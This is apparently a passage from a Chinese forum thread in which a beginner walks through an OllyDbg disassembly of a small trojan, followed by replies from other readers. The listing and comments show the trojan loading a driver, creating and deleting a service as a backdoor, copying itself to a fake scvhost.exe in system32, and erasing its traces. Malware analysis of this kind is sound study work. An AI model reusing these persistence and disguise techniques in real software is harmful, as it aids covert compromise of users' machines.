00401784 FFD6 call esi
00401786 8D4424 1C lea eax, dword ptr
0040178A 6A 00 push 0
0040178C 50 push eax
0040178D 6A 00 push 0
0040178F 6A 00 push 0
00401791 8D4C24 30 lea ecx, dword ptr
00401795 6A 08 push 8
00401797 51 push ecx
00401798 68 14202200 push 222014
0040179D 57 push edi
0040179E C74424 40 E8104>mov dword ptr , 004010E8 ; ASCII "123321"
004017A6 C74424 44 B0114>mov dword ptr , 004011B0
004017AE FF15 98104000 call dword ptr 对设备进行指定的操作
004017B4 8B1D 9C104000 mov ebx, dword ptr ; kernel32.Sleep
004017BA 68 B80B0000 push 0BB8
004017BF FFD3 call ebx
004017C1 8B9424 48020000 mov edx, dword ptr
004017C8 52 push edx
004017C9 68 E8104000 push 004010E8 ; ASCII "123321"
004017CE FFD6 call esi
004017D0 55 push ebp
004017D1 68 B0114000 push 004011B0
004017D6 FFD6 call esi
004017D8 8D4424 1C lea eax, dword ptr
004017DC 6A 00 push 0
004017DE 50 push eax
004017DF 6A 00 push 0
004017E1 6A 00 push 0
004017E3 8D4C24 30 lea ecx, dword ptr
004017E7 6A 08 push 8
004017E9 51 push ecx
004017EA 68 14202200 push 222014
004017EF 57 push edi
004017F0 C74424 40 E8104>mov dword ptr , 004010E8 ; ASCII "123321"
004017F8 C74424 44 B0114>mov dword ptr , 004011B0
00401800 FF15 98104000 call dword ptr DeviceIoControl
{
0012F254 000002B8|hDevice = 000002B8
0012F258 00222014|IoControlCode = 222014
0012F25C 0012F294|InBuffer = 0012F294
0012F260 00000008|InBufferSize = 8
0012F264 00000000|OutBuffer = NULL
0012F268 00000000|OutBufferSize = 0
0012F26C 0012F290|pBytesReturned = 0012F290
0012F270 00000000\pOverlapped = NULL
}
00401806 68 B80B0000 push 0BB8
0040180B 33F6 xor esi, esi
0040180D FFD3 call ebx
0040180F 8BC6 mov eax, esi
00401811 5E pop esi
00401812 5D pop ebp
00401813 5B pop ebx
00401814 5F pop edi
00401815 81C4 30020000 add esp, 230
0040181B C3 retn
0040181C 8B4424 10 mov eax, dword ptr
00401820 5F pop edi
00401821 81C4 30020000 add esp, 230
00401827 C3 retn
}
004026ED 8D9424 78020000 lea edx, dword ptr
004026F4 52 push edx "C:\WINDOWS\system32\drivers\pcidump.sys"
004026F5 E8 B6EEFFFF call 004015B0 这个call进去看看。。。开启服务,创建后门呢
{
004015B0 83EC 24 sub esp, 24
004015B3 57 push edi
004015B4 6A 02 push 2
004015B6 B0 70 mov al, 70
004015B8 6A 00 push 0
004015BA 6A 00 push 0
004015BC 884424 10 mov byte ptr , al
004015C0 C64424 11 63 mov byte ptr , 63
004015C5 C64424 12 69 mov byte ptr , 69
004015CA C64424 13 64 mov byte ptr , 64
004015CF C64424 14 75 mov byte ptr , 75
004015D4 C64424 15 6D mov byte ptr , 6D
004015D9 884424 16 mov byte ptr , al
004015DD C64424 17 00 mov byte ptr , 0
004015E2 FF15 14104000 call dword ptr 打开服务管理器
004015E8 8BF8 mov edi, eax
004015EA 85FF test edi, edi
004015EC 74 3C je short 0040162A
004015EE 53 push ebx
004015EF 56 push esi
004015F0 8D4424 0C lea eax, dword ptr
004015F4 68 20000100 push 10020 ; UNICODE "PROFILE=C:\Documents and Settings\All Users"
004015F9 50 push eax
004015FA 57 push edi
004015FB FF15 0C104000 call dword ptr 打开服务
00401601 8B1D 00104000 mov ebx, dword ptr 关闭
00401607 8BF0 mov esi, eax
00401609 85F6 test esi, esi
0040160B 74 18 je short 00401625
0040160D 8D4C24 14 lea ecx, dword ptr
00401611 51 push ecx
00401612 6A 01 push 1
00401614 56 push esi
00401615 FF15 08104000 call dword ptr control
0040161B 56 push esi
0040161C FF15 04104000 call dword ptr 删除
00401622 56 push esi
00401623 FFD3 call ebx
00401625 57 push edi
00401626 FFD3 call ebx
00401628 5E pop esi
00401629 5B pop ebx
0040162A 68 F4010000 push 1F4
0040162F FF15 9C104000 call dword ptr ; kernel32.Sleep
00401635 8B5424 2C mov edx, dword ptr
00401639 52 push edx
0040163A FF15 A0104000 call dword ptr 删除
00401640 5F pop edi
00401641 83C4 24 add esp, 24
00401644 C3 retn
}
12.伪造一个scvhost.exe在C:\WINDOWS\SYSTEM32路径下:
004027A2 8D9424 70010000 lea edx, dword ptr C:\WINDOWS\system32\scvhost.exe
004027A9 6A 01 push 1
004027AB 8D4424 74 lea eax, dword ptr
004027AF 52 push edx
004027B0 50 push eax
004027B1 FF15 70104000 call dword ptr 转移文件MoveFileExA
{
0012F4B4 0012F530|ExistingName = "C:\Documents and Settings\Administrator\",D7,"烂鎈zuo\zuo.exe"
0012F4B8 0012F630|NewName = "C:\WINDOWS\system32\scvhost.exe"
0012F4BC 00000001\Flags = REPLACE_EXISTING
}
004027B7 8B35 48104000 mov esi, dword ptr
004027BD 8D8C24 70010000 lea ecx, dword ptr
004027C4 8D5424 70 lea edx, dword ptr
004027C8 51 push ecx
004027C9 52 push edx
004027CA FFD6 call esi
004027CC 85C0 test eax, eax
004027CE 74 18 je short 004027E8
004027D0 8D8424 74050000 lea eax, dword ptr
004027D7 8D4C24 70 lea ecx, dword ptr
004027DB 50 push eax
004027DC 51 push ecx
004027DD FFD6 call esi
004027DF 85C0 test eax, eax
004027E1 74 05 je short 004027E8
004027E3 E8 88F3FFFF call 00401B70 进行各种删除操作和隐藏操作,其中还创建了一个k78a.dat的批处理,退出
004027E8 5F pop edi
004027E9 5E pop esi
004027EA 5D pop ebp
004027EB 33C0 xor eax, eax
004027ED 5B pop ebx
004027EE 81C4 680B0000 add esp, 0B68
004027F4 C2 1000 retn 10
哈,终于分析完了,木马虽小,但五脏俱全,总结一下,首先创建互斥量,然后根据启动运行的时间来生成两个文件(一个dll,一个exe),创建驱动,加载驱动
创建服务,建立后门,最后的时候还不忘了删除痕迹哈,不错不错。
额,不会添加代码的那种,看起来就有点乱,纠结了。。。。
菜菜的第一次相当于,有失误之处,还请同学们之处,共同进步哈!
当初加入LSG,现在就要为了自己的理想而奋斗,加油!
既然选择了远方,便只顾风雨简兼程!!!
好高深吖.. 老大 你的汇编的技术好强啊!!!!!!{:301_1003:} 好,是盗号的还是做什么用的 启发式是说杀软吧?加载个驱动就叫启发式,是不是我落伍了 回复 nbw 的帖子
嗯,这个是我搞错了,启发式应该是还没有存入病毒库的病毒吧,谢谢大侠不吝赐教!! 本人菜鸟,请教楼主,做出这样的分析 需要精通哪些方面的知识 扎实的编程功底,逆向自然水到渠成{:1_912:} 好复杂啊 慢慢学 了 我是外行,有懂的说说需要看那些书?